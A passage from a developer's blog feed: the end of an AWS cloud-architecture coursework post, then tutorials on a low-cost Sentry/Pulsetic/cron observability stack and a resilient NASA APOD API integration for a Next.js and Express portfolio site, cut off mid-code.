ELB	Distribute inbound traffic	Always-on	Scales transparently
RDS (PostgreSQL)	Structured data: orders, rides, payments	db.r5.large, Multi-AZ	Read replicas on demand
S3	Receipts, media assets, backups	Pay-per-GB	Unlimited
Lambda	Event-driven workflows	128 MB / 3s timeout	1,000 concurrent (raisable)
Route 53	DNS routing and health checks	Always-on, per-query billing	Globally redundant
VPC	Network isolation	Single VPC, subnet per tier	Peering + private endpoints as needed
CloudFront	CDN - static asset delivery	Global edge	Scales to any volume
CloudWatch	Monitoring and autoscale triggers	Always-on	15 months metric retention
AWS WAF + Shield	DDoS mitigation, traffic filtering	Shield Standard (free)	Shield Advanced available

Building in Public

Studying for a Master's while working full-time means assignments like this don't stay abstract. The same patterns - load balancing, autoscaling, IAM, cost modelling - appear in the systems I work with every week.

I'm sharing the architecture diagrams, the reasoning, and the assessments publicly because the learning compounds when it's in the open.

📋 Assessment Brief - CCF501 Assessment 1
📄 My Report - Technology Report and Presentation
🖥️ My Presentation Slides

If you're designing cloud architectures - or just starting to think about them - what pattern challenged your assumptions the most?


References

Amazon Web Services. (n.d.-a). AWS Well-Architected Framework. https://aws.amazon.com/architecture/well-architected/

Amazon Web Services. (n.d.-b). AWS Pricing. https://aws.amazon.com/pricing/

Bittok, T. (2022). Cloud total cost of ownership. LinkedIn Pulse. https://www.linkedin.com/pulse/cloud-total-cost-ownership-theophilus-bittok-/

Eliaçık, E. (2022). Pros and cons of cloud computing. Dataconomy. https://dataconomy.com/2022/05/pros-and-cons-of-cloud-computing-2022/

IBM. (n.d.-b). What is a public cloud? IBM. https://www.ibm.com/think/topics/public-cloud

McHaney, R. (2021). Cloud technologies: An overview of cloud computing technologies for managers. Wiley.

Mell, P., & Grance, T. (2011). The NIST definition of cloud computing (Special Publication 800-145). NIST. https://doi.org/10.6028/NIST.SP.800-145

Production Observability for $0: How I Monitor My Portfolio with Sentry + Pulsetic

Luis Faria — Mon, 02 Mar 2026 04:24:30 +0000

I got my first Sentry weekly report. 23 errors. 1.7k transactions. On a side project. That's what production observability looks like — and it costs $0.

The Email That Made It Real

A few weeks after shipping the monitoring stack, the email landed:

I read it twice. Not because something was on fire — but because this is what production engineers actually see (or should) every Monday morning. Error counts. Transaction volume. Trends. I was flying blind before this. Not anymore.

In this post, I'm sharing details of how I built a 4-layer observability stack on my portfolio (luisfaria.dev) - open source, free tier, real production data.

The Problem: Shipping Blind

My previous dev.to article (From git pull to GitOps) ended with this honest admission in the "Future Roadmap" section:

"Monitoring & Alerting: Sentry for error tracking, uptime monitoring, and resource alerts. Current health checks cover the basics, but production-grade observability is the next evolution."

Once the CI/CD pipeline was working — tests passing, Docker images building, Discord pings on deploy — I had a new problem. I had no idea what was happening after the deploy.

Was the site up? Were there errors? Were users hitting rate limits? Was the server about to OOM?

I didn't know. So I fixed it.

The Architecture: 4 Layers

                ┌─────────────────────────────────┐
                │   External Uptime Monitor       │
                │   (Pulsetic)                    │
                │   Pings /health/ready every 60s │
                └────────────┬────────────────────┘
                             │ HTTPS
                ┌────────────▼────────────────────┐
                │   Nginx (reverse proxy)         │
                │   Port 80/443                   │
                └────────────┬────────────────────┘
                             │
          ┌──────────────────┼──────────────────┐
          │                  │                  │
┌─────────▼───────┐  ┌──────▼──────────┐  ┌─────▼───────┐
│  Frontend       │  │  Backend API    │  │  MongoDB    │
│  (Next.js)      │  │  (Express)      │  │  + Redis    │
│  @sentry/nextjs │  │  @sentry/node   │  │             │
└────────┬────────┘  └──────┬──────────┘  └─────────────┘
         │                   │
         └─────────┬─────────┘
                   │
          ┌────────▼────────┐
          │   Sentry.io     │
          │   Error Tracking│
          └─────────────────┘

┌─────────────────────────────────┐
│  Cron (every 5 min)             │
│  monitor-resources.sh           │
│  CPU / Memory / Disk / Docker   │
│  → Discord Webhook              │
│  (deduplicated, 30-min cooldown)│
└─────────────────────────────────┘

Each layer covers a different failure mode:

Layer	What it catches	Latency
Health endpoints	Is the process running? DB/Redis connected?	Instant
Sentry	Code errors, crashes, slow transactions	< 1 min
Pulsetic	External view — is the site reachable?	< 2 min
Cron script	CPU/Mem/Disk/Docker going wrong	< 5 min

Layer 1: Tiered Health Endpoints

Before wiring up external monitors, I needed something for them to ping. I built three tiers — each with a different audience and a different level of detail.

// backend/src/routes/health.ts

// Liveness probe — "is the process running?"
// Always 200. Load balancers use this.
router.get('/health', (_req, res) => {
  res.status(200).json({ status: 'ok' });
});

// Readiness probe — "can it serve traffic?"
// 200 when healthy, 503 when degraded.
// Pulsetic targets this endpoint.
router.get('/health/ready', async (_req, res) => {
  const { healthy, checks } = await runChecks();

  // Strip latencies — no sensitive details for public consumers
  const coarseChecks: Record<string, { status: string }> = {};
  for (const [key, val] of Object.entries(checks)) {
    coarseChecks[key] = { status: val.status };
  }

  res.status(healthy ? 200 : 503).json({
    status: healthy ? 'ok' : 'degraded',
    timestamp: new Date().toISOString(),
    checks: coarseChecks,
  });
});

// Internal diagnostics — full checks + system info
// IP-whitelisted: loopback, Docker bridge, 10.x private networks only.
// CI pipeline uses this from inside the Docker network.
router.get('/health/details', async (req, res) => {
  if (!isTrusted(req)) {
    res.status(403).json({ error: 'Forbidden' });
    return;
  }

  const { healthy, checks } = await runChecks();
  const system = getSystemInfo();

  res.status(healthy ? 200 : 503).json({
    status: healthy ? 'ok' : 'degraded',
    timestamp: new Date().toISOString(),
    checks,   // includes latencies
    system,   // includes memoryUsage, loadAvg, cpus, uptime, nodeVersion
  });
});
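
The routes above rely on a runChecks() helper that isn't shown. Here is a minimal sketch of how such a helper could work, assuming each dependency exposes an async probe that throws on failure. The names Probe, withTimeout and runProbe, the probes parameter, and the 2-second default timeout are illustrative assumptions, not the repo's actual code.

```typescript
// Hypothetical sketch: the real runChecks() in the repo may look different.
type CheckResult = { status: 'ok' | 'error'; latencyMs: number };
type Probe = () => Promise<void>;

// Rejects if the wrapped promise does not settle within timeoutMs.
function withTimeout<T>(promise: Promise<T>, timeoutMs: number): Promise<T> {
  return new Promise<T>((resolve, reject) => {
    const timer = setTimeout(() => reject(new Error('probe timed out')), timeoutMs);
    promise.then(
      (value) => { clearTimeout(timer); resolve(value); },
      (error) => { clearTimeout(timer); reject(error); }
    );
  });
}

// Runs one probe, timing it and turning a throw or timeout into status 'error'.
async function runProbe(probe: Probe, timeoutMs: number): Promise<CheckResult> {
  const started = Date.now();
  try {
    await withTimeout(probe(), timeoutMs);
    return { status: 'ok', latencyMs: Date.now() - started };
  } catch {
    return { status: 'error', latencyMs: Date.now() - started };
  }
}

// Runs all probes in parallel; healthy only if every probe passed.
async function runChecks(
  probes: Record<string, Probe>,
  timeoutMs = 2000
): Promise<{ healthy: boolean; checks: Record<string, CheckResult> }> {
  const pairs = await Promise.all(
    Object.entries(probes).map(
      async ([name, probe]) => [name, await runProbe(probe, timeoutMs)] as const
    )
  );
  const checks: Record<string, CheckResult> = {};
  for (const [name, result] of pairs) checks[name] = result;
  const healthy = pairs.every(([, result]) => result.status === 'ok');
  return { healthy, checks };
}
```

Running the probes in parallel keeps the endpoint's latency close to the slowest dependency rather than the sum of all of them, which matters when an uptime monitor polls it every 60 seconds.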

The IP guard for /health/details is worth calling out:

const TRUSTED_EXACT = new Set(['127.0.0.1', '::1', '::ffff:127.0.0.1']);
const TRUSTED_PREFIXES = [
  '10.',
  // Private range 172.16.0.0/12 (172.16.x through 172.31.x), which includes Docker's bridge networks
  ...Array.from({ length: 16 }, (_, i) => `172.${16 + i}.`),
];

function isTrusted(req: Request): boolean {
  const ip = req.ip || req.socket?.remoteAddress || '';
  if (TRUSTED_EXACT.has(ip)) return true;
  return TRUSTED_PREFIXES.some((prefix) => ip.startsWith(prefix));
}

Calling it from the public internet returns 403 Forbidden. From inside Docker (CI pipeline) it returns the full diagnostics JSON.
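
One edge case worth sketching: when Node listens on a dual-stack socket, IPv4 clients can appear as IPv4-mapped IPv6 addresses such as ::ffff:172.18.0.3, which a plain startsWith('172.') check would not match. The variant below strips that prefix before comparing. The names normalizeIp and isTrustedIp are hypothetical, and whether the deployment ever sees mapped addresses is an assumption that depends on how the server binds.

```typescript
// Sketch only: normalizes IPv4-mapped IPv6 addresses before the prefix checks.
const LOOPBACK = new Set(['127.0.0.1', '::1']);
const PRIVATE_PREFIXES = [
  '10.',
  // 172.16.x through 172.31.x
  ...Array.from({ length: 16 }, (_, i) => `172.${16 + i}.`),
];

// "::ffff:10.0.0.5" becomes "10.0.0.5"; anything else is returned unchanged.
function normalizeIp(raw: string): string {
  const mappedPrefix = '::ffff:';
  return raw.toLowerCase().startsWith(mappedPrefix) ? raw.slice(mappedPrefix.length) : raw;
}

function isTrustedIp(raw: string): boolean {
  const ip = normalizeIp(raw);
  if (LOOPBACK.has(ip)) return true;
  return PRIVATE_PREFIXES.some((prefix) => ip.startsWith(prefix));
}
```

Taking a plain string instead of the Express request keeps the check easy to unit test; the route handler would pass in req.ip or the socket's remote address.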

Layer 2: Sentry — Error Tracking for Both Services

The Backend Setup (`@sentry/node`)

The critical thing: the Sentry setup file (backend/src/instrument.ts) must be the very first import in backend/src/index.ts. Before Express, before Apollo, before anything.

// backend/src/instrument.ts
import * as Sentry from '@sentry/node';
import type { EventHint } from '@sentry/node';
import { GraphQLError } from 'graphql';

const AUTH_CODES = new Set(['UNAUTHENTICATED', 'FORBIDDEN', 'BAD_USER_INPUT']);

if (process.env.SENTRY_DSN) {
  Sentry.init({
    dsn: process.env.SENTRY_DSN,
    environment: process.env.NODE_ENV,
    tracesSampleRate: process.env.NODE_ENV === 'production' ? 0.2 : 1.0,

    beforeSend(event, hint: EventHint) {
      // Skip HTTP 401/403 — auth flow, not bugs
      const statusCode = event.contexts?.response?.status_code;
      if (statusCode === 401 || statusCode === 403) return null;

      // Skip GraphQL auth/validation errors
      const original = hint.originalException;
      if (original instanceof GraphQLError) {
        const code = original.extensions?.code;
        if (typeof code === 'string' && AUTH_CODES.has(code)) return null;
      }

      return event;
    },

    initialScope: { tags: { service: 'portfolio-api' } },
  });
}

The beforeSend filter is important. Without it, every unauthenticated API request fires a Sentry event. That's noise, not signal — so I filter out UNAUTHENTICATED, FORBIDDEN, BAD_USER_INPUT, and HTTP 401/403.

For GraphQL specifically, I added an Apollo plugin that captures non-auth errors:

// In Apollo Server setup (backend/src/index.ts)
plugins: [
  {
    async requestDidStart() {
      return {
        async didEncounterErrors({ errors }) {
          for (const err of errors) {
            const code = err.extensions?.code as string | undefined;
            if (!AUTH_CODES.has(code ?? '')) {
              Sentry.captureException(err);
            }
          }
        },
      };
    },
  },
],

The Frontend Gotcha: `instrumentation.ts`

This is the part that trips up almost everyone on Next.js 13+. It gave me more work than expected. You can install @sentry/nextjs, add sentry.client.config.ts, wrap your config with withSentryConfig() - and still get zero frontend errors in Sentry.

The missing piece: frontend/src/instrumentation.ts.

// frontend/src/instrumentation.ts
export async function register() {
  if (process.env.NEXT_RUNTIME === 'nodejs') {
    await import('../sentry.server.config');
  }

  if (process.env.NEXT_RUNTIME === 'edge') {
    await import('../sentry.edge.config');
  }
}

This file is Next.js's official hook for initializing server-side code. Without it, Sentry's server/edge SDK never initializes, so SSR errors and API route errors silently vanish.

You need three Sentry config files at the frontend root:

frontend/
├── sentry.client.config.ts  ← browser-side errors + session replay
├── sentry.server.config.ts  ← SSR error capture
├── sentry.edge.config.ts    ← middleware error capture
└── src/
    └── instrumentation.ts   ← THE HOOK THAT WIRES IT ALL TOGETHER

And next.config.ts needs to be wrapped:

// frontend/next.config.ts
import { withSentryConfig } from '@sentry/nextjs';
export default withSentryConfig(nextConfig, sentryWebpackPluginOptions);

I also added src/app/global-error.tsx to catch React rendering errors. Otherwise component-level crashes disappear without a trace.

Layer 3: Pulsetic — External Uptime Monitoring

Sentry tells you about code errors. Pulsetic tells you if the whole site is unreachable. These are different problems.

Setup is 5 minutes:

Create a free account at pulsetic.com
Add monitor: https://luisfaria.dev/health/ready
Check interval: 60 seconds, regions: Sydney + US East
Confirmation period: 2 checks (avoids false positives during rolling deploys)
Alert channel: Discord webhook

The key insight: configure Pulsetic to alert on 503, not just timeouts. When MongoDB goes down, /health/ready returns 503 degraded — not a network failure, but definitely something I want to know about.

Requiring 2 consecutive failures prevents alert spam during a normal deploy. Containers restart, health checks briefly fail - that's expected. Two consecutive failures means something is actually broken.

Layer 4: Cron Resource Monitor

Sentry and Pulsetic cover errors and availability. But what about the server silently running out of disk space? Or memory creeping up after a week of traffic? Those kill a VPS quietly - no crash, no error, just degradation.

I wrote a bash script that runs every 5 minutes:

# server/monitor-resources.sh (simplified)
# Thresholds: 85% for CPU, Mem, Disk
# Alerts: Discord webhook
# Dedup: 30-minute cooldown per alert type

# Fail fast if the webhook URL was not provided by the environment
DISCORD_WEBHOOK_URL="${DISCORD_WEBHOOK_URL:?DISCORD_WEBHOOK_URL is not set}"
THRESHOLD=85
STATE_DIR="/var/lib/monitor"

check_memory() {
  local used_pct
  used_pct=$(free | awk '/^Mem:/ {printf "%.0f", $3/$2*100}')
  if [ "$used_pct" -gt "$THRESHOLD" ]; then
    send_alert_if_not_deduped "memory" "Memory at ${used_pct}%"
  fi
}

check_docker() {
  # Alert if any expected container is not running
  for container in frontend_webapp backend_api nginx_gateway mongodb_db redis_cache; do
    if ! docker ps --format '{{.Names}}' | grep -q "^${container}$"; then
      send_alert_if_not_deduped "docker_${container}" "Container ${container} is down"
    fi
  done
}

The deduplication is the part I'm most proud of. Without it, a memory spike at 86% would fire an alert every 5 minutes until someone fixed it. With it, the first alert fires and then nothing for 30 minutes. The disk doesn't lie, but it doesn't need to shout either.
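
The cooldown logic itself is small. The sketch below shows the idea in TypeScript with an in-memory map; the bash script presumably persists its state under STATE_DIR instead, and the name shouldSendAlert is a hypothetical stand-in for send_alert_if_not_deduped.

```typescript
// Hypothetical in-memory version of the 30-minute cooldown per alert type.
const COOLDOWN_MS = 30 * 60 * 1000;
const lastSent = new Map<string, number>();

// Returns true (and records the send time) only when the alert type
// has not fired within the cooldown window.
function shouldSendAlert(alertType: string, nowMs: number = Date.now()): boolean {
  const previous = lastSent.get(alertType);
  if (previous !== undefined && nowMs - previous < COOLDOWN_MS) return false;
  lastSent.set(alertType, nowMs);
  return true;
}
```

Keying the cooldown by alert type means a memory alert does not suppress a disk alert that fires a minute later.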

Security model — because this runs with Docker socket access:

Concern	Solution
Runs as	Dedicated `monitor` system user (no login shell)
Docker access	`monitor` added to `docker` group (the script only runs read-only commands, though group membership itself grants full Docker access)
Webhook secret	`/etc/monitor/monitor.env` (chmod 600, owned by `monitor`)
Logs	Logrotate: daily rotation, 7-day retention

# Setup (on the server)
useradd --system --no-create-home --shell /usr/sbin/nologin monitor
usermod -aG docker monitor

# Cron entry (system crontab format, e.g. a file in /etc/cron.d, which takes the user field)
*/5 * * * * monitor /opt/monitor/monitor-resources.sh >> /var/log/monitor-resources.log 2>&1

Real Data: First Sentry Weekly Report

After running this for one week, the Sentry weekly email arrived:

Service	Errors	Transactions
Frontend (Next.js)	6	1,451
Backend (Node.js)	17	270
Total	23	1,721

The 17 backend errors were mostly from testing the error-capture flow (I fired test exceptions during setup). The 6 frontend errors included a couple of ResizeObserver events that I subsequently filtered out.

Most importantly: I could see which GraphQL resolvers were slow, which routes had errors, and exactly what the call stack looked like for each failure. Stack traces with source maps. Breadcrumbs showing what the user did before the crash. Session replay for frontend errors (1% of sessions, 100% of errored ones).

What I Learned: SRE Concepts Applied

Concept	Implementation
Liveness probe	`GET /health` — always 200, load balancers use this
Readiness probe	`GET /health/ready` — 200 or 503, Pulsetic targets this
Internal diagnostics	`GET /health/details` — IP-whitelisted, CI pipeline uses this
Error budget	Sentry free: 5K errors/month — if you hit this, something is very wrong
Incident detection	Pulsetic catches outages in < 2 min
Alert fatigue	30-min dedup prevents Discord spam
Least privilege	Monitor script runs as `monitor` user, not root
Secret management	Webhook URL in restricted `/etc/monitor/monitor.env` (chmod 600)
Graceful degradation	503 with `"degraded"` when a dependency is down, not a hard crash
Observability pillars	Logs (Winston) + Metrics (health/cron) + Traces (Sentry)

The Alert Flow

Error in code    → Sentry (instant)         → Sentry dashboard + email
Site goes down   → Pulsetic (< 2 min)       → Discord + email
CPU/Mem/Disk     → Cron script (every 5m)   → Discord (deduplicated)
Deploy fails     → GitHub Actions (instant)  → Discord (existing pipeline)
Container crash  → Cron script (every 5m)   → Discord (deduplicated)

Key Takeaways

1. The `instrumentation.ts` File Is Not Optional

For Next.js 13+ (/src directory structure), frontend/src/instrumentation.ts is the initialization hook that wires Sentry into SSR and edge runtimes. Skip it and you get zero server-side error data.

2. Filter Before You Drown in Auth Noise

Without beforeSend, every 401/403 becomes a Sentry event. On an app with auth, that's most of your error budget. Filter UNAUTHENTICATED, FORBIDDEN, BAD_USER_INPUT at the source.

3. 503 Is Not "Down" — Design for Degradation

Health checks that return 503 on dependency failures give uptime monitors something actionable. A binary "up/down" monitor misses the nuance of "site works but database is slow."

4. Alert Deduplication Is Not Optional

A 30-minute cooldown on resource alerts prevents alert fatigue. If your phone buzzes every 5 minutes for the same disk usage spike, you'll start ignoring it — which defeats the point.

5. Real Data Changes How You Think

Before the weekly report, I thought about errors abstractly. After seeing "23 errors, 1.7k transactions," the numbers have names, stack traces, and user actions attached. That's the difference between guessing and knowing.

Tech Stack

Layer	Technology	Cost
Error tracking	Sentry (free tier: 5K errors/mo)	$0
Uptime monitoring	Pulsetic (free tier: 10 monitors)	$0
Resource alerts	Bash + cron + Discord webhook	$0
Health endpoints	Express routes (already deployed)	$0
Frontend	Next.js + `@sentry/nextjs`	$0
Backend	Node.js + `@sentry/node`	$0

Try It Yourself

The full implementation is open source:

Resource	Link
Live Site	luisfaria.dev
Open Source Repo	https://github.com/lfariabr/luisfaria.dev
Health Routes	backend/src/routes/health.ts
Backend Sentry	backend/src/instrument.ts
Frontend Sentry	frontend/src/instrumentation.ts
Cron Script	server/monitor-resources.sh
Epic Tracker	Issue #115 — Observability

Let's Connect

If you're building observability on a budget, working with Next.js + Node.js in production, or navigating Sentry's Next.js integration (that instrumentation.ts gotcha gets everyone), I'd love to trade notes:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Built with too many Discord pings and one very satisfying weekly Sentry email by Luis Faria

Whether it's concrete or code, structure is everything.

My portfolio fetches NASA's Daily Space Photo - and never fails!

Luis Faria — Fri, 20 Feb 2026 07:44:47 +0000

I integrated NASA's Astronomy Picture of the Day (read about it) into my portfolio.

SPOILER ALERT: Contains rate limiting, fallback scraping, modular architecture, and production-grade error handling that never leaves users hanging.

The Vision: Bringing Space to My Portfolio

My portfolio (luisfaria.dev) runs a full-stack MERN application with authentication, a chatbot, and a GraphQL API. I wanted to add something unique — something that would genuinely delight users while showcasing real-world API integration skills.

Between terms of my Master's Degree, I had a few weeks off. Perfect vacation project, right? BTW, I'm open-sourcing the whole thing — check it out! mastersSWEAI repo

The idea: A floating action button that reveals NASA's daily Astronomy Picture of the Day (APOD). Simple concept, complex execution.

The User Experience

Click the NASA rocket button: 👉 luisfaria.dev

Anonymous users: Get today's APOD instantly — no login required
Authenticated users: Browse NASA's entire archive dating back to 1995
Rate limiting: 5 requests/hour per user to protect the NASA API quota
Resilience: If NASA's API fails, automatic HTML scraping fallback kicks in

Here's exactly what happens when someone clicks that rocket button:

👉 See the image in HD

The Challenge: External APIs Are Unreliable

Integrating third-party APIs sounds straightforward — until reality hits:

NASA API Reality	Production Requirements
Rate limits (1000 req/day)	Must protect quota, gracefully throttle users
504 Gateway Timeouts	Can't show users blank screens
Validation issues	NASA sometimes returns `media_type: "other"` with no `url` field
Network failures	ETIMEDOUT, connection refused, DNS issues
Schema drift	NASA API evolves independently of your code

The goal: Build an integration that:

Handles every failure mode gracefully
Never crashes the server
Falls back automatically when NASA is down
Logs everything for debugging
Provides structured errors to clients

Spoiler: NASA's API went down during development. More than once.

The Architecture: Layered Resilience

Here's the system I designed:

Browser (Next.js/React)
    ↓
GraphQL API (Apollo Server)
    ↓
APOD Service Layer
    ├──→ NASA API (primary, with retries + timeout)
    └──→ HTML Scraping Fallback (when API fails)
         ↓
    Redis Rate Limiter (atomic Lua scripts)
         ↓
    MongoDB (cache successful responses)
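
To make the rate limiter box in the diagram concrete, here is a minimal fixed-window sketch of the 5 requests/hour rule. It is an in-memory stand-in for illustration only: the article's limiter uses Redis with atomic Lua scripts, and both the fixed-window strategy and the names consume and buckets are assumptions.

```typescript
// In-memory stand-in; the production limiter runs in Redis via Lua scripts.
const LIMIT = 5;
const WINDOW_MS = 60 * 60 * 1000;

type WindowState = { count: number; resetAt: number };
const buckets = new Map<string, WindowState>();

// Counts one request against the key's current window and reports the outcome.
function consume(
  key: string,
  nowMs: number = Date.now()
): { allowed: boolean; remaining: number } {
  const current = buckets.get(key);
  // No window yet, or the previous one expired: start a fresh window.
  if (current === undefined || nowMs >= current.resetAt) {
    buckets.set(key, { count: 1, resetAt: nowMs + WINDOW_MS });
    return { allowed: true, remaining: LIMIT - 1 };
  }
  if (current.count >= LIMIT) return { allowed: false, remaining: 0 };
  current.count += 1;
  return { allowed: true, remaining: LIMIT - current.count };
}
```

In a multi-process deployment the read-check-increment sequence has to be atomic, which is the reason to push it into a Lua script on the Redis side rather than doing it in application code.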

Key Architectural Decisions (3 of them!)

1. GraphQL Shield for Authorization

getTodaysApod is public (no login)
getApodByDate requires authentication (prevents abuse)

2. Modular Service Design

src/services/apod/
├── index.ts              # Barrel export
├── apod.service.ts       # Orchestrator (API + fallback)
├── apod.api.ts           # NASA API client
├── apod.fallback.ts      # HTML scraping fallback
├── apod.errors.ts        # Typed error codes
├── apod.types.ts         # Zod schemas, TypeScript types
└── apod.constants.ts     # URLs, timeouts, retry config

3. Shared Error Handling Infrastructure

Instead of copy-pasting try/catch blocks across every resolver (we've all been there), I built a reusable error handler:

// src/utils/errors/graphqlErrors.ts (signature only; implementation omitted)
export declare function createErrorHandler<TCode, TError>(
  mapErrorCode: (code: TCode) => ErrorCode,
  isServiceError: (error: unknown) => error is TError,
  defaultMessage: string
): <T>(
  // The returned wrapper, withErrorHandling(fn, operationName)
  fn: () => Promise<T>,
  operationName: string
) => Promise<T>;

Now any service can use it:

// APOD resolver (34 lines total)
export const ApodQueries = {
  getTodaysApod: async (_, __, context) =>
    withApodErrorHandling(
      () => fetchApod({ context: { userId: context.user?.id } }),
      'getTodaysApod'
    ),

  getApodByDate: async (_, args, context) => {
    if (!context.user) {
      throw Errors.unauthenticated('Authentication required');
    }
    return withApodErrorHandling(
      () => fetchApod({ date: args.date, context: { userId: context.user.id } }),
      'getApodByDate'
    );
  },
};
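
For readers who want to see the wrapper's moving parts, here is a self-contained sketch of what a createErrorHandler body could look like. The ErrorCode union, the appError helper, and the ApodError stand-in type are assumptions made for this example (the repo's version presumably throws GraphQL errors instead), so treat it as an illustration of the pattern rather than the actual implementation.

```typescript
// Stand-in types for illustration; not the repo's definitions.
type ErrorCode = 'RATE_LIMITED' | 'INTERNAL_SERVER_ERROR';
type AppError = Error & { code: ErrorCode; operation: string };

function appError(message: string, code: ErrorCode, operation: string): AppError {
  return Object.assign(new Error(message), { code, operation });
}

function createErrorHandler<TCode, TError extends { code: TCode; message: string }>(
  mapErrorCode: (code: TCode) => ErrorCode,
  isServiceError: (error: unknown) => error is TError,
  defaultMessage: string
) {
  return async function withErrorHandling<T>(
    fn: () => Promise<T>,
    operationName: string
  ): Promise<T> {
    try {
      return await fn();
    } catch (error) {
      // Known service errors keep their message and get a mapped code.
      if (isServiceError(error)) {
        throw appError(error.message, mapErrorCode(error.code), operationName);
      }
      // Anything unexpected is hidden behind the default message.
      throw appError(defaultMessage, 'INTERNAL_SERVER_ERROR', operationName);
    }
  };
}

// Wiring it up for a hypothetical APOD error type.
type ApodCode = 'RATE_LIMITED' | 'NASA_API_ERROR';
type ApodError = Error & { code: ApodCode };

const isApodError = (error: unknown): error is ApodError =>
  error instanceof Error && typeof (error as { code?: unknown }).code === 'string';

const withApodErrorHandling = createErrorHandler<ApodCode, ApodError>(
  (code) => (code === 'RATE_LIMITED' ? 'RATE_LIMITED' : 'INTERNAL_SERVER_ERROR'),
  isApodError,
  'Failed to fetch APOD'
);
```

The factory takes the two service-specific pieces (the type guard and the code mapper) once, so each resolver only supplies the operation to run and its name.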

The Journey: 8 Issues, 40+ Commits, 1 Production Feature

This didn't work on the first try. Or the fifth. Here's the honest implementation timeline:

Tracked in: Epic v2.4 - APOD Feature
All 40+ commits to (apod) feature

Phase 1: Foundation (Issues #61-65)

Frontend: NASA-Branded Floating Action Button

Built ApodFab.tsx following the same pattern as the existing GogginsFab component:

Circular button with NASA gradient border (linear-gradient(135deg, #0B3D91, #FC3D21, #1E90FF))
Rocket icon with blue pulse aura effect
Radix UI tooltip: "Astronomy Picture of the Day"
Accessible (ARIA labels, keyboard navigation)
Light/dark mode support

Frontend: APOD Dialog Component

Created ApodDialog.tsx with:

Date display with calendar icon
Image/video player (handles both media types)
Copyright attribution
External link to NASA APOD website
"Powered by NASA Open APIs" footer

Backend: Configuration & Validation

Set up NASA API credentials:

// backend/src/config/config.ts
interface Config {
  nasaApiKey: string;
}

const requiredEnvVars = ['NASA_API_KEY', ...];

Server refuses to start without NASA_API_KEY — fail fast, no silent surprises.

Phase 2: NASA API Client (Issue #66)

Zod Schema for Runtime Validation

NASA's API returns JSON, but not all fields are guaranteed:

// src/validation/schemas/apod.schema.ts
import { z } from 'zod';

export const apodResponseSchema = z.object({
  copyright: z.string().optional(),
  date: z.string().regex(/^\d{4}-\d{2}-\d{2}$/),
  explanation: z.string().min(1),
  media_type: z.enum(['image', 'video', 'other']),  // 'other' was missing initially!
  title: z.string().min(1),
  url: z.string().url().optional(),  // Not provided for media_type: "other"
  hdurl: z.string().url().optional(),
  apod_url: z.string().url().optional(),  // Computed field
});

export type ApodResponse = z.infer<typeof apodResponseSchema>;

NASA API Service with Retries

Built apod.api.ts with:

Exponential backoff retries (3 attempts)
8-second timeout per request
AbortController for proper cleanup
Structured logging (latency, status code, userId)

export async function fetchApodFromApi(
  url: string,
  context?: ApodRequestContext
): Promise<ApodResponse> {
  const startTime = Date.now();
  const controller = new AbortController();
  const timeoutId = setTimeout(() => controller.abort(), TIMEOUT_MS);

  try {
    const response = await fetch(url, {
      signal: controller.signal,
      headers: { 'User-Agent': 'luisfaria.dev/1.0' },
    });

    if (!response.ok) {
      throw new ApodServiceError(
        `NASA API error: ${response.status}`,
        response.status === 429 ? 'RATE_LIMITED' : 'NASA_API_ERROR',
        response.status
      );
    }

    const data = await response.json();
    const validated = apodResponseSchema.parse(data);

    logger.info('NASA API request successful', {
      latencyMs: Date.now() - startTime,
      date: validated.date,
      userId: context?.userId,
    });

    return validated;
  } catch (error) {
    // Error mapping logic...
    throw error; // rethrow so callers (and the fallback) see the failure
  } finally {
    clearTimeout(timeoutId);
  }
}
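
The function above shows the timeout but not the retry loop. A generic exponential backoff wrapper could look like the sketch below. The names withRetries and RetryOptions, and the choice to double the delay on each attempt, are assumptions for illustration and not the values in apod.constants.ts.

```typescript
// Illustrative retry helper; option names and defaults are assumptions.
type RetryOptions = {
  attempts: number; // total tries, including the first one
  baseDelayMs: number; // wait before the second try; doubles after each failure
  isRetryable: (error: unknown) => boolean;
};

const sleep = (ms: number) => new Promise<void>((resolve) => setTimeout(resolve, ms));

async function withRetries<T>(
  fn: (attempt: number) => Promise<T>,
  options: RetryOptions
): Promise<T> {
  let lastError: unknown;
  for (let attempt = 1; attempt <= options.attempts; attempt++) {
    try {
      return await fn(attempt);
    } catch (error) {
      lastError = error;
      const isLastAttempt = attempt === options.attempts;
      // Give up immediately on the last attempt or on errors that will not heal.
      if (isLastAttempt || !options.isRetryable(error)) break;
      await sleep(options.baseDelayMs * 2 ** (attempt - 1));
    }
  }
  throw lastError;
}
```

A call such as withRetries(() => fetchApodFromApi(url, context), { attempts: 3, baseDelayMs: 500, isRetryable }) would match the "3 attempts" described above; the 500 ms base delay in that call is made up for the example.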

Phase 3: The Hard Part — Failures & Fallbacks (aka scars earned)

This is where production engineering got real. Here's every bug I hit:

#	Problem	Root Cause	Solution
1	Validation failures on `media_type: "other"`	Zod schema only accepted `'image' | 'video'`	Added `'other'` to the `media_type` enum
2	504 Gateway Timeout from NASA	NASA API occasionally unresponsive	Implemented HTML scraping fallback
3	`url` field missing for interactive content	NASA doesn't provide `url` for SDO videos/embeds	Added `apod_url` (computed from date) as fallback
4	Resolver error handling duplication	Try/catch boilerplate in every resolver	Extracted shared `createErrorHandler()` utility
5	Inconsistent error codes between services	Each service used different error mapping	Created `ErrorCodes` constant as single source of truth
6	Rate limit bypass by unauthenticated users	Anonymous users shared the same Redis key	Switched to session-based rate limiting for anonymous users
7	Tests breaking after modular refactor	Tests imported from old monolithic `apod.ts`	Rewrote mocks to match new module structure
8	NGINX 502 after deploying APOD feature	Container DNS caching after recreation	Added `nginx -s reload` to CI/CD pipeline

Bug #2 was the game-changer. When NASA's API returned 504, users saw blank screens. Not acceptable. The fix: automatic HTML scraping fallback — if the API is down, scrape the website directly.

Phase 4: HTML Scraping Fallback (Issue #78)

When the NASA API fails, the service automatically scrapes the official APOD website. Users never know the difference:

// src/services/apod/apod.fallback.ts
import * as cheerio from 'cheerio';

export async function fetchApodHtmlFallback(
  date?: string
): Promise<ApodResponse> {
  const url = date 
    ? `https://apod.nasa.gov/apod/ap${formatDateForApodUrl(date)}.html`
    : 'https://apod.nasa.gov/apod/astropix.html';

  const html = await fetch(url).then(res => res.text());
  const $ = cheerio.load(html);

  // Parse structured data
  const title = $('center:first b:first').text().trim();
  const explanation = $('center:first p:last').text().trim();
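  // APOD pages use relative image paths, so resolve them against the page URL
  const imageSrc = $('center:first img').attr('src');
  const imageUrl = imageSrc ? new URL(imageSrc, url).href : undefined;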

  return {
